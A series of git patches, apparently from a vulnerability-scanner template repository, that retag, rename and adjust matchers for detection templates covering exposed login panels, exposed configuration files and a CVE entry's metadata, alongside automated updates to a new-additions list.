From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 06:19:51 +0000
Subject: [PATCH 54/93] Auto Generated New Template Addition List [Tue Oct 25
 06:19:51 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 69d012aea9..ac3e579ac7 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
 cves/2022/CVE-2022-1007.yaml
+cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
 exposed-panels/temenos-t24-login.yaml
 token-spray/api-nytimes.yaml

From 3957950db7c3cb410f0d31c54cdb77f1762b0982 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 11:53:21 +0530
Subject: [PATCH 56/93] Update openvpn-admin.yaml

---
 exposed-panels/openvpn-admin.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposed-panels/openvpn-admin.yaml b/exposed-panels/openvpn-admin.yaml
index 7cae58bea4..586435b181 100644
--- a/exposed-panels/openvpn-admin.yaml
+++ b/exposed-panels/openvpn-admin.yaml
@@ -7,7 +7,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.title:"OpenVPN-Admin"
-  tags: openvpn,admin,config,panel
+  tags: panel,openvpn,admin,config
 
 requests:
   - method: GET

From aedbf206acde03a482d96467745357b29d65af2d Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 06:25:19 +0000
Subject: [PATCH 57/93] Auto Generated New Template Addition List [Tue Oct 25
 06:25:19 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index ac3e579ac7..5b4738d003 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,5 +1,6 @@
 cves/2022/CVE-2022-1007.yaml
 cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
+exposed-panels/openvpn-admin.yaml
 exposed-panels/temenos-t24-login.yaml
 token-spray/api-nytimes.yaml

From 5055ee462c412fe5127e20dd977ac5e577de86fe Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 06:26:43 +0000
Subject: [PATCH 58/93] Auto Generated New Template Addition List [Tue Oct 25
 06:26:43 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 5b4738d003..4235f65275 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,5 +2,6 @@ cves/2022/CVE-2022-1007.yaml
 cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
 exposed-panels/openvpn-admin.yaml
+exposed-panels/openvpn-connect.yaml
 exposed-panels/temenos-t24-login.yaml
 token-spray/api-nytimes.yaml

From fcfe9b318ebe71453db98c8466ab23b6e4029d58 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 06:35:53 +0000
Subject: [PATCH 59/93] Auto Generated CVE annotations [Tue Oct 25 06:35:53 UTC
 2022] :robot:

---
 cves/2022/CVE-2022-1057.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-1057.yaml b/cves/2022/CVE-2022-1057.yaml
index 90f8620eca..0489fe4083 100644
--- a/cves/2022/CVE-2022-1057.yaml
+++ b/cves/2022/CVE-2022-1057.yaml
@@ -11,10 +11,13 @@ info:
     - https://wordpress.org/plugins/pricing-deals-for-woocommerce/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-1057
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-1057
+    cwe-id: CWE-89
   metadata:
-    verified: true
-  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,unauth
+    verified: "true"
+  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth
 
 requests:
   - raw:

From fe26c84d2f312a13984dbb52964af7bf3b991860 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 13:45:17 +0530
Subject: [PATCH 60/93] Update and rename
 technologies/git-repository-browser.yaml to
 exposed-panels/git-repository-browser.yaml

---
 {technologies => exposed-panels}/git-repository-browser.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename {technologies => exposed-panels}/git-repository-browser.yaml (88%)

diff --git a/technologies/git-repository-browser.yaml b/exposed-panels/git-repository-browser.yaml
similarity index 88%
rename from technologies/git-repository-browser.yaml
rename to exposed-panels/git-repository-browser.yaml
index fcee91f0e0..7f36f2fc50 100644
--- a/technologies/git-repository-browser.yaml
+++ b/exposed-panels/git-repository-browser.yaml
@@ -1,13 +1,13 @@
 id: git-repository-browser
 
 info:
-  name: Git repository browser detect
+  name: Git Repository Browser Detect
   author: tess
   severity: info
   metadata:
     verified: true
     shodan-dork: http.title:"Git repository browser"
-  tags: tech,detect,git,misc
+  tags: panel,git
 
 requests:
   - method: GET

From b0564a862d1d5e9e302f5f27941b918243392aac Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 13:47:52 +0530
Subject: [PATCH 61/93] Update turnkey-openvpn.yaml

---
 exposed-panels/turnkey-openvpn.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposed-panels/turnkey-openvpn.yaml b/exposed-panels/turnkey-openvpn.yaml
index 5289fb9c3c..c3b3b85da7 100644
--- a/exposed-panels/turnkey-openvpn.yaml
+++ b/exposed-panels/turnkey-openvpn.yaml
@@ -7,7 +7,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.title:"TurnKey OpenVPN"
-  tags: openvpn,turnkey,webshell,panel
+  tags: panel,openvpn,turnkey,webshell,vpn
 
 requests:
   - method: GET

From e6da8814ee0cbb5c795311317b1ed7bd8978879f Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 08:25:16 +0000
Subject: [PATCH 62/93] Auto Generated New Template Addition List [Tue Oct 25
 08:25:16 UTC 2022] :robot:

---
 .new-additions | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.new-additions b/.new-additions
index 4235f65275..f6b4ed4c14 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,7 +1,9 @@
 cves/2022/CVE-2022-1007.yaml
 cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
+exposed-panels/git-repository-browser.yaml
 exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
 exposed-panels/temenos-t24-login.yaml
+exposed-panels/turnkey-openvpn.yaml
 token-spray/api-nytimes.yaml

From 49e05652e3a1205e4bcd29e9ab9a35cea8677d44 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 14:05:59 +0530
Subject: [PATCH 64/93] Update and rename gitblit-panel-detect.yaml to
 gitblit-panel.yaml

---
 .../{gitblit-panel-detect.yaml => gitblit-panel.yaml}    | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)
 rename exposed-panels/{gitblit-panel-detect.yaml => gitblit-panel.yaml} (72%)

diff --git a/exposed-panels/gitblit-panel-detect.yaml b/exposed-panels/gitblit-panel.yaml
similarity index 72%
rename from exposed-panels/gitblit-panel-detect.yaml
rename to exposed-panels/gitblit-panel.yaml
index 650e5a080c..0faf2b4918 100644
--- a/exposed-panels/gitblit-panel-detect.yaml
+++ b/exposed-panels/gitblit-panel.yaml
@@ -1,13 +1,13 @@
-id: gitblit-panel-detect
+id: gitblit-panel
 
 info:
-  name: Gitblit login panel detect
+  name: Gitblit Login Panel Detect
   author: tess
   severity: info
   metadata:
     verified: true
     shodan-dork: http.title:"Gitblit"
-  tags: tech,detect,misc
+  tags: panel,gitblit
 
 requests:
   - method: GET
@@ -23,8 +23,7 @@ requests:
         words:
           - "<title>Gitblit</title>"
           - "Welcome to Gitblit"
-          - "A quick and easy way to host or view your own"
-        condition: and
+        condition: or
 
       - type: status
         status:

From 88f95682d192e307867dd02909784afb318d7f7d Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 08:38:28 +0000
Subject: [PATCH 65/93] Auto Generated New Template Addition List [Tue Oct 25
 08:38:27 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index f6b4ed4c14..043878c1d4 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,6 +2,7 @@ cves/2022/CVE-2022-1007.yaml
 cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
 exposed-panels/git-repository-browser.yaml
+exposed-panels/gitblit-panel.yaml
 exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
 exposed-panels/temenos-t24-login.yaml

From 2f84c2cbd2b850bb72f7a531a38d8a15e7b37220 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 14:09:06 +0530
Subject: [PATCH 66/93] Update maestro-login-panel.yaml

---
 exposed-panels/maestro-login-panel.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/exposed-panels/maestro-login-panel.yaml b/exposed-panels/maestro-login-panel.yaml
index b95872a768..0c8155515d 100644
--- a/exposed-panels/maestro-login-panel.yaml
+++ b/exposed-panels/maestro-login-panel.yaml
@@ -1,13 +1,13 @@
 id: maestro-login-panel
 
 info:
-  name: Maestro - LuCI login panel detect
+  name: Maestro - LuCI Login Panel
   author: tess
   severity: info
   metadata:
     verified: true
     shodan-dork: http.title:"Maestro - LuCI"
-  tags: tech,detect,misc
+  tags: panel,maestro,luci
 
 requests:
   - method: GET

From 01e330653e77151e26464363da0e5f98fa30205d Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 14:40:24 +0530
Subject: [PATCH 67/93] Update and rename code-server-login-panel.yaml to
 code-server-login.yaml

---
 ...{code-server-login-panel.yaml => code-server-login.yaml} | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
 rename exposed-panels/{code-server-login-panel.yaml => code-server-login.yaml} (84%)

diff --git a/exposed-panels/code-server-login-panel.yaml b/exposed-panels/code-server-login.yaml
similarity index 84%
rename from exposed-panels/code-server-login-panel.yaml
rename to exposed-panels/code-server-login.yaml
index 3336086f7c..ea3dd9da6d 100644
--- a/exposed-panels/code-server-login-panel.yaml
+++ b/exposed-panels/code-server-login.yaml
@@ -1,4 +1,4 @@
-id: code-server-login-panel
+id: code-server-login
 
 info:
   name: Code Server Login
@@ -6,8 +6,8 @@ info:
   severity: info
   metadata:
     verified: true
-    shodan-dork: html:"config.yaml"
-  tags: tech,detect,misc
+    shodan-dork: http.title:"code-server login"
+  tags: panel,detect,misc
 
 requests:
   - method: GET

From 8e05bb6cdd76b26e00f4b9f3a4e41ebaf35d7e74 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 09:10:55 +0000
Subject: [PATCH 68/93] Auto Generated New Template Addition List [Tue Oct 25
 09:10:55 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 043878c1d4..ee28ae7d78 100644
--- a/.new-additions
+++ b/.new-additions
@@ -3,6 +3,7 @@ cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
 exposed-panels/git-repository-browser.yaml
 exposed-panels/gitblit-panel.yaml
+exposed-panels/maestro-login-panel.yaml
 exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
 exposed-panels/temenos-t24-login.yaml

From 47d4e5aae6c60c393b0a4ff0952d2ac0bfaafba1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 14:42:28 +0530
Subject: [PATCH 69/93] Update openfire-admin-panel.yaml

---
 exposed-panels/openfire-admin-panel.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/exposed-panels/openfire-admin-panel.yaml b/exposed-panels/openfire-admin-panel.yaml
index 5c82dfbaf1..1e98b513d7 100644
--- a/exposed-panels/openfire-admin-panel.yaml
+++ b/exposed-panels/openfire-admin-panel.yaml
@@ -7,7 +7,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.title:"Openfire Admin Console"
-  tags: openfire,admin,console, panel
+  tags: panel,openfire,admin,console
 
 requests:
   - method: GET
@@ -23,8 +23,8 @@ requests:
         words:
           - '<title>Openfire Admin Console'
           - 'Openfire, Version:'
-        condition: and
+        condition: or
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200

From cfa68c4ab82d340f4e06c86d7dd940f437de50b5 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 09:13:19 +0000
Subject: [PATCH 70/93] Auto Generated New Template Addition List [Tue Oct 25
 09:13:19 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index ee28ae7d78..e68d67be24 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,6 +1,7 @@
 cves/2022/CVE-2022-1007.yaml
 cves/2022/CVE-2022-1057.yaml
 cves/2022/CVE-2022-41840.yaml
+exposed-panels/code-server-login.yaml
 exposed-panels/git-repository-browser.yaml
 exposed-panels/gitblit-panel.yaml
 exposed-panels/maestro-login-panel.yaml

From d5c4135faa9cee69f0e898d2e4882b5296b3982c Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 14:44:35 +0530
Subject: [PATCH 71/93] Update and rename xeams-admin.yaml to
 xeams-admin-console.yaml

---
 exposed-panels/{xeams-admin.yaml => xeams-admin-console.yaml} | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename exposed-panels/{xeams-admin.yaml => xeams-admin-console.yaml} (90%)

diff --git a/exposed-panels/xeams-admin.yaml b/exposed-panels/xeams-admin-console.yaml
similarity index 90%
rename from exposed-panels/xeams-admin.yaml
rename to exposed-panels/xeams-admin-console.yaml
index e0e275fadf..2786ce29cc 100644
--- a/exposed-panels/xeams-admin.yaml
+++ b/exposed-panels/xeams-admin-console.yaml
@@ -1,4 +1,4 @@
-id: xeams-admin
+id: xeams-admin-console
 
 info:
   name: Xeams Admin Console
@@ -7,7 +7,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.title:"Xeams Admin"
-  tags: xeams,admin,console
+  tags: panel,xeams,admin,console
 
 requests:
   - method: GET

From d6a845fce6e1d9a0f623e9cf43a98b219fe61f67 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 09:15:11 +0000
Subject: [PATCH 72/93] Auto Generated New Template Addition List [Tue Oct 25
 09:15:11 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index e68d67be24..d0e7ea0ec2 100644
--- a/.new-additions
+++ b/.new-additions
@@ -5,6 +5,7 @@ exposed-panels/code-server-login.yaml
 exposed-panels/git-repository-browser.yaml
 exposed-panels/gitblit-panel.yaml
 exposed-panels/maestro-login-panel.yaml
+exposed-panels/openfire-admin-panel.yaml
 exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
 exposed-panels/temenos-t24-login.yaml

From a2aa0975d1571080cfcda8911a8d71041d926818 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 09:30:55 +0000
Subject: [PATCH 74/93] Auto Generated New Template Addition List [Tue Oct 25
 09:30:55 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index d0e7ea0ec2..701757ed90 100644
--- a/.new-additions
+++ b/.new-additions
@@ -10,4 +10,5 @@ exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
 exposed-panels/temenos-t24-login.yaml
 exposed-panels/turnkey-openvpn.yaml
+exposed-panels/xeams-admin-console.yaml
 token-spray/api-nytimes.yaml

From 5c25433d272dd8aedfb060fcc25b6f83145499e0 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 15:03:07 +0530
Subject: [PATCH 75/93] Update openvpn-router-management.yaml

---
 exposed-panels/openvpn-router-management.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposed-panels/openvpn-router-management.yaml b/exposed-panels/openvpn-router-management.yaml
index 3537d4f547..7877cbc9fd 100644
--- a/exposed-panels/openvpn-router-management.yaml
+++ b/exposed-panels/openvpn-router-management.yaml
@@ -7,7 +7,7 @@ info:
   metadata:
     verified: true
     shodan-query: http.html:"Router Management - Server OpenVPN"
-  tags: panel,openvpn,router,management
+  tags: panel,openvpn,router
 
 requests:
   - method: GET

From ada2461cbbb2af0f302d96e52c7e1c4d3393d328 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 09:37:34 +0000
Subject: [PATCH 77/93] Auto Generated New Template Addition List [Tue Oct 25
 09:37:34 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 701757ed90..0d3d9aa243 100644
--- a/.new-additions
+++ b/.new-additions
@@ -8,6 +8,7 @@ exposed-panels/maestro-login-panel.yaml
 exposed-panels/openfire-admin-panel.yaml
 exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
+exposed-panels/openvpn-router-management.yaml
 exposed-panels/temenos-t24-login.yaml
 exposed-panels/turnkey-openvpn.yaml
 exposed-panels/xeams-admin-console.yaml

From 1dc959f37e0659c5457f72eefb3766bd03edf34b Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 09:45:17 +0000
Subject: [PATCH 78/93] Auto Generated New Template Addition List [Tue Oct 25
 09:45:17 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 0d3d9aa243..1be1c3595e 100644
--- a/.new-additions
+++ b/.new-additions
@@ -12,4 +12,5 @@ exposed-panels/openvpn-router-management.yaml
 exposed-panels/temenos-t24-login.yaml
 exposed-panels/turnkey-openvpn.yaml
 exposed-panels/xeams-admin-console.yaml
+misconfiguration/cadvisor-exposure.yaml
 token-spray/api-nytimes.yaml

From 118ac8a22effe9a962ae6bebbb1e1bc72ca7ceb6 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 15:29:05 +0530
Subject: [PATCH 79/93] Update superset-login.yaml

---
 exposed-panels/superset-login.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/exposed-panels/superset-login.yaml b/exposed-panels/superset-login.yaml
index 6d4f2b2e25..fbbd421413 100644
--- a/exposed-panels/superset-login.yaml
+++ b/exposed-panels/superset-login.yaml
@@ -6,20 +6,24 @@ info:
   severity: info
   metadata:
     verified: true
-    shodan-query: title:"Superset"
+    shodan-query: http.favicon.hash:1582430156
   tags: panel,superset
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/login/#'
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/login'
 
+    stop-at-first-match: true
+    host-redirects: true
+    max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<title>Superset</title>"
+          - 'alt="Superset"'
 
       - type: word
         part: header

From 2838205898b2c61ed44f48c8a8cbeb32efbb2488 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 15:35:30 +0530
Subject: [PATCH 80/93] Update cargo-lock-package.yaml

---
 exposures/files/cargo-lock-package.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposures/files/cargo-lock-package.yaml b/exposures/files/cargo-lock-package.yaml
index b7254b3b91..2456695ca0 100644
--- a/exposures/files/cargo-lock-package.yaml
+++ b/exposures/files/cargo-lock-package.yaml
@@ -3,7 +3,7 @@ id: cargo-lock-package
 info:
   name: Cargo Lock Packages Disclosure
   author: DhiyaneshDk
-  severity: low
+  severity: info
   reference:
     - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt
   metadata:

From 8400d79ed7885024d1f2ca481874e65a70ea2446 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 10:05:51 +0000
Subject: [PATCH 81/93] Auto Generated New Template Addition List [Tue Oct 25
 10:05:51 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 1be1c3595e..497ed02602 100644
--- a/.new-additions
+++ b/.new-additions
@@ -9,6 +9,7 @@ exposed-panels/openfire-admin-panel.yaml
 exposed-panels/openvpn-admin.yaml
 exposed-panels/openvpn-connect.yaml
 exposed-panels/openvpn-router-management.yaml
+exposed-panels/superset-login.yaml
 exposed-panels/temenos-t24-login.yaml
 exposed-panels/turnkey-openvpn.yaml
 exposed-panels/xeams-admin-console.yaml

From b50b07ddd2c6c8f3dbfc21f1b72d61bed8566452 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 15:37:03 +0530
Subject: [PATCH 82/93] Update cargo-toml-file.yaml

---
 exposures/files/cargo-toml-file.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposures/files/cargo-toml-file.yaml b/exposures/files/cargo-toml-file.yaml
index 86e4688ac8..41efea3b1b 100644
--- a/exposures/files/cargo-toml-file.yaml
+++ b/exposures/files/cargo-toml-file.yaml
@@ -3,7 +3,7 @@ id: cargo-toml-file
 info:
   name: Cargo TOML File Disclosure
   author: DhiyaneshDk
-  severity: low
+  severity: info
   reference:
     - https://doc.rust-lang.org/cargo/reference/manifest.html
   metadata:

From 2e7d966e3737402b5592acc230afcc426ee99c5b Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 10:07:22 +0000
Subject: [PATCH 83/93] Auto Generated New Template Addition List [Tue Oct 25
 10:07:21 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 497ed02602..d9dad9a9f4 100644
--- a/.new-additions
+++ b/.new-additions
@@ -13,5 +13,6 @@ exposed-panels/superset-login.yaml
 exposed-panels/temenos-t24-login.yaml
 exposed-panels/turnkey-openvpn.yaml
 exposed-panels/xeams-admin-console.yaml
+exposures/files/cargo-lock-package.yaml
 misconfiguration/cadvisor-exposure.yaml
 token-spray/api-nytimes.yaml

From f7c86e1752b1014b42659f00f4682ad79cc91814 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 10:10:26 +0000
Subject: [PATCH 85/93] Auto Generated New Template Addition List [Tue Oct 25
 10:10:26 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index d9dad9a9f4..9a5bb6ac32 100644
--- a/.new-additions
+++ b/.new-additions
@@ -14,5 +14,6 @@ exposed-panels/temenos-t24-login.yaml
 exposed-panels/turnkey-openvpn.yaml
 exposed-panels/xeams-admin-console.yaml
 exposures/files/cargo-lock-package.yaml
+exposures/files/cargo-toml-file.yaml
 misconfiguration/cadvisor-exposure.yaml
 token-spray/api-nytimes.yaml

From b0d3a6661ce009f5d8fc70078e479e878cdb0d87 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 10:12:03 +0000
Subject: [PATCH 86/93] Auto Generated New Template Addition List [Tue Oct 25
 10:12:03 UTC 2022] :robot:

---
 .new-additions | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.new-additions b/.new-additions
index 9a5bb6ac32..1b68a4d059 100644
--- a/.new-additions
+++ b/.new-additions
@@ -16,4 +16,6 @@ exposed-panels/xeams-admin-console.yaml
 exposures/files/cargo-lock-package.yaml
 exposures/files/cargo-toml-file.yaml
 misconfiguration/cadvisor-exposure.yaml
+misconfiguration/express-stack-trace.yaml
+technologies/express-default-page.yaml
 token-spray/api-nytimes.yaml

From 6e594533651cc80317a342a22d3b25ec305e5ae1 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 16:23:09 +0530
Subject: [PATCH 88/93] Update rundeck-login.yaml

---
 exposed-panels/rundeck-login.yaml | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)

diff --git a/exposed-panels/rundeck-login.yaml b/exposed-panels/rundeck-login.yaml
index f0590b8527..579261dd66 100644
--- a/exposed-panels/rundeck-login.yaml
+++ b/exposed-panels/rundeck-login.yaml
@@ -2,7 +2,7 @@ id: rundeck-login
 
 info:
   name: RunDeck Login Panel
-  author: DhiyaneshDk,daffainfo
+  author: DhiyaneshDk, daffainfo
   severity: info
   metadata:
     verified: true
@@ -14,13 +14,15 @@ requests:
     path:
       - '{{BaseURL}}/user/login'
 
+    host-redirects: true
+    max-redirects: 2
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - 'Rundeck - Login</title>'
-          - 'alt="Rundeck'
+          - 'alt="Rundeck"'
+          - '/assets/rundeck' ## For old rundeck
         condition: or
 
       - type: status
@@ -32,5 +34,6 @@ requests:
         part: body
         group: 1
         regex:
-          - '<a href=\"https:\/\/docs.rundeck.com\/([0-9.]+)'
-          - '<a href=\"http:\/\/rundeck\.org\/([0-9.]+)' ## Detection version on old rundeck
+          - 'utm_medium=([0-9.]+)-'
+          - 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck
+          - '<span class="version">([0-9.-]+)<\/span>' ## Detection on very old rudneck

From 538de73fce0b78e583d1fff836c9953d5ed3568e Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 16:23:35 +0530
Subject: [PATCH 90/93] Update and rename
 misconfiguration/db-xml-file-exposed.yaml to exposures/files/db-xml-file.yaml

---
 .../files/db-xml-file.yaml                           | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
 rename misconfiguration/db-xml-file-exposed.yaml => exposures/files/db-xml-file.yaml (69%)

diff --git a/misconfiguration/db-xml-file-exposed.yaml b/exposures/files/db-xml-file.yaml
similarity index 69%
rename from misconfiguration/db-xml-file-exposed.yaml
rename to exposures/files/db-xml-file.yaml
index 57592e8fe3..c0728ced52 100644
--- a/misconfiguration/db-xml-file-exposed.yaml
+++ b/exposures/files/db-xml-file.yaml
@@ -1,12 +1,12 @@
-id: db-xml-file-exposed
+id: db-xml-file
 
 info:
-  name: db.xml file exposed
+  name: db.xml File Exposure
   author: tess
   severity: medium
   metadata:
     verified: true
-  tags: db,exposure,misconfig
+  tags: misconfig,db,files,exposure
 
 requests:
   - method: GET
@@ -20,9 +20,9 @@ requests:
       - type: word
         part: body
         words:
-          - "ServerName"
-          - "DBPASS"
-          - "DBtype"
+          - "<ServerName>"
+          - "<DBPASS>"
+          - "<DBtype>"
         condition: and
 
       - type: status

From 2210cc8fae0e09dc994735ec145687e722859c32 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 25 Oct 2022 16:25:15 +0530
Subject: [PATCH 91/93] Update vmware-authentication-daemon-detect.yaml

---
 .../detection/vmware-authentication-daemon-detect.yaml | 10 ++++++----
 1 file changed, 6 insertions(+), 4 deletions(-)

diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml
index 9b89b5b67f..e95b503f7f 100644
--- a/network/detection/vmware-authentication-daemon-detect.yaml
+++ b/network/detection/vmware-authentication-daemon-detect.yaml
@@ -1,4 +1,4 @@
-id: vmware-authentication-daemon-detect
+id: vmware-authentication-daemon
 
 info:
   name: VMware Authentication Daemon Detection
@@ -9,7 +9,7 @@ info:
   metadata:
     verified: true
     shodan-query: 'product:"VMware Authentication Daemon"'
-  tags: network,vmware,auth
+  tags: network,vmware,authenticated
 
 network:
 
@@ -18,13 +18,15 @@ network:
     host:
       - "{{Hostname}}"
       - "{{Host}}:902"
-    matchers-condition: and
+
     matchers:
       - type: word
         words:
           - "ServerDaemonProtocol:SOAP"
           - "MKSDisplayProtocol:VNC"
+        condition: and
+
     extractors:
       - type: regex
         regex:
-          - "VMware Authentication Daemon Version ([0-9.]+)"
\ No newline at end of file
+          - "VMware Authentication Daemon Version ([0-9.]+)"

From da8995aee5fbc13e43b908f36ea96b19767f7aef Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 10:55:53 +0000
Subject: [PATCH 92/93] Auto Generated New Template Addition List [Tue Oct 25
 10:55:53 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 1b68a4d059..180d72789c 100644
--- a/.new-additions
+++ b/.new-additions
@@ -15,6 +15,7 @@ exposed-panels/turnkey-openvpn.yaml
